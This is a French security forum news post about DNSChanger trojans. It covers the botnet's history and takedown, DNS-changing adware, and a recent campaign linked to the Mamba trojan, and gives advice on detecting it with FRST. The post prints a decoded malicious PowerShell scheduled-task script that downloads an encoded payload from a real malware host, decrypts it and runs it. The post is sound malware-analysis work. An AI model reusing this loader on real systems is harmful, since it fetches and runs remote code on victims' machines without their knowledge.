Trojan DNSChanger

L'actualité & News Informatique!
Donc pas de demande d'aide dans cette partie.
Malekal_morte
Messages : 116212
Inscription : 10 sept. 2005 13:57

Trojan DNSChanger

par Malekal_morte »

Le nom DNSChanger désigne généralement des trojans qui modifient la configuration DNS (serveurs de noms) pour effectuer des attaques MITM (homme du milieu).

Pour toute l'historique des Trojan.DNSChanger, vous pouvez aussi lire la page suivante : Trojan.DNSChanger.

Le tout premier Trojan DNS nommé DNSChanger était un malware lié aux attaques rogues/scareware (Trojan.FakeAv et plus antérieure Trojan.Zlob), il a sévit de 2006 à 2011. Quelques liens :
Trojan DNSChanger et Trojan DNSChanger.

Ce malware est monté à plus de 4 millions de bots, utilisant des serveurs aux USA et dont l'origine est l'Estonie. En 2011, une opération de démantèlement a eu lieu :
Esthost Taken Down – Biggest Cybercriminal Takedown in History (Trend-Micro)
Cybercrime Kingpin Pleads Guilty (krebonsecurity).

La monétisation du botnet se faisait à travers du "clic fraud" c'est à dire la génération de clics sur des publicités et auraient atteint les 14 millions de dollars.

La structure du Trojan DNSChanger :
nelicash_TrojanDNSChanger_Trend-Micro.jpg
Depuis, certains Adware dont CloudScout utilise ce procédé de modification DNS et notamment le fameux DNS Unlocker(qui semble changer de noms depuis vers des noms en *Lix >> AnyFlix / TopFlix etc)



Un autre malware type "DNSChanger" est aussi très en vogue ces dernières semaines, je le vois pas mal sur des rapports pjjoint (FRST).
Ce DNSChanger serait installé par un Trojan qui se nomme Mamba, un Trojan écrit en python.

Malwarebytes et Cisco ont publié des actualités dessus.
Malwarebytes Trojan.DNSChanger
DNSChanger Outbreak Linked to Adware Install Base

Ce dernier s'appuie sur une tâche planifiée qui lance PowerShell, vous avez un exemple sur ce rapport pjjoint : http://pjjoint.malekal.com/files.php?re ... x13t7y1012
DNSChanger_task_powershell.png
Décodé on obtient :

Code : Tout sélectionner

$ErrorActionPreference="stop";$sc="SilentlyContinue";$WarningPreference=$sc;$ProgressPreference=$sc;$VerbosePreference=$sc;$DebugPreference=$sc;
function sr($p){$n="WindowPosition";try{New-Item -Path $p|Out-Null;}catch{}try{New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664|Out-Null;}
catch{try{Set-ItemProperty -Path $p -Name $n -Value 201329664|Out-Null;}catch{}}}sr("HKCU:\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe");sr("HKCU:\Console\%SystemRoot%_System32_svchost.exe");sr("HKCU:\Console\taskeng.exe");
$surl="http://fasilmy.info/u/?q=1WLt_qZkpelxemrtZvcUXqyUXFuJUWUndPk85JmwYo3WQMR0XdiH_4TRAO97XYHgwjqT8zHAz9UVmbPil6bhCwTLqZ9wsH64N-E10_rPNG8CYeMi0HWMvLi9ulQ-y3dtZHTXoq7yzRKaa25oUbeuJa9ViFWb8jcya5OIQgrQErwfCYs4_Z7ulLPgvHydQrNonjGscQM26VSfLWcjpI3QK56W2THxGmjdLjU-PE878tNIZ-H0D-w1Jf2iHInjpCaOfIgFIZVhAlplZfoHOpOYg36QKb-KyRS_TuF09yir-3p2WeoUOdyNl1KvUE9SU19zsAhE_Mb6rKSGXpyPGUyyODOr-PO56dlLvZKOUTIGRQfnkBa1luRdrN9fEKy3D06zQaio2bfq0YC2CFGpJ-1re12wQ5Ums0IXfgdEg6Gl082PvhW4advUh34XwhlXkM6k0sl58OjK6DNIMc0&c=Us3DEoFo5gpr0Yr7qy1XpsNyO90HLzg5CncwF1A5qTwqAwt6LrmbOW_3KwQ1x7jdwDIhLS3N8Mh-J2CpCzVIGSVg_EWYjaKExDh_uJbGwM4qSAMyG7pssR_ief3zvv6fGmxYydUTPVMvYwn3x25vO1MWrHufGzV15kXVys4PzGaJY3IkFWE2IFKQOP3eApFdQq_kbD8kJGSI0ardocvOKS2Li8dFwwbVZWQ5xGHXFkedYmqFUUTNjEyJhhwfzcP0xvZaIQuGj2PPh5hlAgUiFxCgkhWSxpkDQW91EO4qacAPnLmx_6iYbgC0BTmxp96HgcUgpNc9NGWAPVATzfdMUNxdvwHq8zp-1tvSc2S7ttcXlSgZ6KqwRtjy1wJkKpBqH9C-i6OFB8vqGU02u2GV7rpWYGUKd5-jHIdn8lCtMbkb7Wm-2jE6KHGK24X79NtGz15l7RxbH3um6pzctNvEu9JqHj0dBl4RCKHOY2PMGJ8X4BipH_4rjMSpFSAu6AA9ZW2peVUOnPlcxzztn5gowrmKsdE6KSgVdaPsOiIG46O0crj4M6_EbsQqS39kPguVvfTrc1JppmOhkkO1getgp0jBdr2_lbK1y68LJksYK2h-v2ZX9_P28lnMEKPea9ZUcSqzFH3paRdBvOMfVldOds2gE9oKsopfX2k&r=8176974896963333939";$stsk="{29868362-9105-EA9B-C368-4FB6EFFBF867}";$prid="DT";$inid="0";try{if($PSVersionTable.PSVersion.Major -lt 2){break;}$v=[System.Environment]::OSVersion.Version;
if($v.Major -eq 5){if(($v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion -lt 2)){break;}}
if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){break;}
function wc($url){$rq=New-Object System.Net.WebClient;$rq.UseDefaultCredentials=$true;$rq.Headers.Add("user-agent","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)");return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url));}
function dstr($rawdata){$bt=[Convert]::FromBase64String($rawdata);$ext=$bt[0];$key=$bt[1] -bxor 170;for($i=2;$i -lt $bt.Length;$i++){$bt[$i]=($bt[$i] -bxor (($key + $i) -band 255));}
return(New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream((New-Object IO.MemoryStream($bt,2,($bt.Length-$ext))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();}
$sc=dstr(wc($surl));Invoke-Expression -command "$sc";}catch{};exit 0;
Les URLs en /u/ sont typiques de ce malware.

(A ce sujet, concernant les malwares utilisant PowerShell, je vous renvoie sur le sujet : Malware FileLess : Kovter, PoweLiks, Gootkit, etc)


La campagne de Trojan DNSChanger atteint les 100 hosts par millions :
dns-changer-infections-host-per-million.png
Pour vérifier si un Windows est infecté, simplement lancer une analyse FRST (le tutoriel FRST) et vérifier le contenu du fichier Addition.txt si la tâche planifiée est présente.

Pour toute l'historique des Trojan.DNSChanger, vous pouvez aussi lire la page suivante : Trojan.DNSChanger.
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Actualité & News Informatique »